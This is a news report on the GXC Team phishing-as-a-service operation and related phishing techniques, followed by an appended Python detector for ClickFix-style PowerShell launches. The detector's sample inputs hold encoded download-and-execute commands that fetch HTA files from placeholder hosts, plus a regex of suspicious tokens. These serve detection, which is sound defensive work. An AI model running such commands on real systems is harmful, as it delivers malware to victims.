Date: 2024-07-26

A Spanish-speaking cybercriminal group called GXC Team has been observed integrating phishing kits with malicious Android applications, taking malware-as-a-service (MaaS) offerings to a new level.

How GXC Team operates, according to cybersecurity researchers

Singapore-based cybersecurity firm Group-IB, which has been monitoring GXC Team since January 2023, described the crimeware solution as a “sophisticated AI-powered phishing-as-a-service platform” capable of affecting users of over 36 Spanish banks, government agencies and 30 institutions worldwide.

GXC Team’s phishing kit ranges in price from $150 to $900 per month, while the package that includes the phishing kit and Android malware is available on a subscription basis for around $500 per month.

The campaign targets users of Spanish financial institutions, as well as tax and government services, e-commerce, banks and cryptocurrency exchanges in the United States, the United Kingdom, Slovakia and Brazil. Up to 288 phishing domains have been identified so far in connection with the activity.

The services on offer also include the sale of stolen banking credentials and custom coding schemes to other cybercriminal groups that, like GXC Team, target banks, financial institutions and cryptocurrency companies.

GXC Team is an atypical operator

“Unlike typical phishing developers, GXC Team combined phishing kits with malware to steal OTP codes via SMS, tilting the typical phishing attack scenario in a slightly different direction,” said security researchers Anton Ushakov and Martijn van den Berk in a report published Thursday.

What is remarkable here is that, instead of using a fake page to harvest credentials directly, those behind GXC Team lure victims into downloading an Android banking app under the pretext of protecting them from phishing attacks. The pages pushing the app are distributed through smishing and other methods.

Once installed, the GXC Team app requests permission to be set as the default SMS app, which lets it intercept one-time passwords and other messages and exfiltrate them to a Telegram bot under the attackers’ control.

“In the final stage the app opens the authentic website of a bank in WebView allowing users to interact normally,” the researchers said. “After that, whenever the attacker triggers the OTP prompt, the Android malware silently receives and forwards SMS messages with OTP codes to the attacker-controlled Telegram chat.”

Among other services advertised by cybercriminals on a dedicated Telegram channel are AI-infused voice calling tools that allow their customers to generate voice calls to potential targets based on a series of prompts directly from the phishing kit.

These calls typically masquerade as coming from a bank, instructing users to provide their two-factor authentication (2FA) codes, install malicious apps, or perform other arbitrary actions.

“Using this simple yet effective mechanism makes the scam scenario even more convincing for their victims and demonstrates how quickly and easily AI tools are adopted and implemented by criminals in their schemes, transforming traditional fraud scenarios into new, more sophisticated tactics,” the researchers stressed.

In a recent report, Google-owned Mandiant revealed how AI-powered voice cloning has the ability to mimic human speech with “astonishing accuracy,” enabling more authentic phishing (or vishing) schemes that facilitate initial access, privilege escalation, and lateral movement.

“Cybercriminals can impersonate executives, colleagues, or even IT support staff to trick victims into revealing confidential information, granting remote access to systems, or transferring funds,” the threat intelligence company said.

Google also added: “The inherent trust associated with a familiar voice can be exploited to manipulate victims into taking actions they normally wouldn’t, such as clicking on malicious links, downloading malware, or disclosing sensitive data.”

GXC Team’s phishing kits, which also come with adversary-in-the-middle (AiTM) capabilities, have become increasingly popular because they lower the technical barrier to running large-scale phishing campaigns.

Other actors use similar techniques

Cybersecurity researcher mr.d0x, in a report released last month, showed that attackers can abuse progressive web apps (PWAs) to build convincing login pages for phishing by manipulating user interface elements to display a fake URL bar.

Additionally, such AiTM phishing kits can be used to gain access to password-protected accounts on various online platforms via an authentication method reduction attack, which exploits the fact that these services still offer a less secure authentication method as a fallback even when passkeys have been configured.

“Since the AiTM can manipulate the view presented to the user by modifying HTML, CSS, images or JavaScript in the login page, as it is proxied through to the end user, they can control the authentication flow and remove all references to passkey authentication,” cybersecurity company eSentire said.

The disclosure comes amid a recent increase in phishing campaigns that embed URLs already encoded by security tools such as Secure Email Gateways (SEGs) in an attempt to mask phishing links and evade scanning, according to Barracuda Networks and Cofense.

Social engineering attacks have also been observed using an unusual method in which users are tricked into visiting seemingly legitimate websites and then prompted to copy, paste and execute obfuscated code in a PowerShell terminal, under the guise of fixing a problem displaying content in the web browser.

Details of this malware delivery method have previously been documented by ReliaQuest and Proofpoint. McAfee Labs is tracking the activity under the name ClickFix.

“By embedding Base64-encoded scripts into seemingly legitimate error prompts, attackers trick users into performing a series of actions that lead to the execution of malicious PowerShell commands,” said researchers Yashvi Shah and Vignesh Dhatchanamoorthy, who added: “These commands typically download and execute payloads, such as HTA files, from remote servers, subsequently distributing malware such as DarkGate and Lumma Stealer.”
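The ClickFix pattern described above (a Base64-encoded PowerShell command that fetches and runs an HTA file) is something a defender can look for in process-creation logs. The following detector is an added example, not code from the article or from any of the vendors it cites; the command lines it scans are constructed samples with placeholder hostnames, not real indicators.

```python
"""Flag ClickFix-style PowerShell launches in process-creation logs (added example)."""
import base64
import re

# Constructed sample command lines modelled on the ClickFix pattern the article
# describes: a Base64 (UTF-16LE) PowerShell script that downloads and runs an HTA.
# Hostnames and paths are placeholders, not real indicators.
SAMPLE_INNER_SCRIPT = "mshta.exe http://example.invalid/fix/display.hta"
SAMPLE_COMMAND_LINES = [
    "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand "
    + base64.b64encode(SAMPLE_INNER_SCRIPT.encode("utf-16le")).decode(),
    'powershell.exe -Command "Get-ChildItem C:\\Users"',  # benign admin use
    "powershell.exe -enc "
    + base64.b64encode(
        ("Invoke-WebRequest http://example.invalid/p.hta -OutFile $env:TEMP\\p.hta; "
         "Start-Process $env:TEMP\\p.hta").encode("utf-16le")).decode(),
]

# PowerShell accepts abbreviated forms of -EncodedCommand; the flag value is Base64.
_ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Tokens associated with the HTA download-and-execute stage the article describes.
_SUSPICIOUS = re.compile(
    r"mshta|\.hta\b|invoke-webrequest|\biwr\b|downloadstring|start-process", re.IGNORECASE)


def decode_encoded_command(cmdline: str):
    """Return the decoded script if cmdline carries an -EncodedCommand flag, else None."""
    m = _ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(cmdline: str) -> dict:
    """Decode any encoded payload and report which suspicious tokens it contains."""
    decoded = decode_encoded_command(cmdline)
    hits = sorted({h.lower() for h in _SUSPICIOUS.findall(decoded or cmdline)})
    # Encoded command + download/HTA tokens is the ClickFix combination worth alerting on.
    return {"encoded": decoded is not None, "decoded": decoded,
            "indicators": hits, "suspicious": decoded is not None and bool(hits)}


def scan(command_lines):
    """Classify every command line; callers can filter on the 'suspicious' key."""
    return [classify(line) for line in command_lines]
```

Real deployments would read command lines from Sysmon Event ID 1 or Windows Security Event ID 4688 rather than the constructed list above.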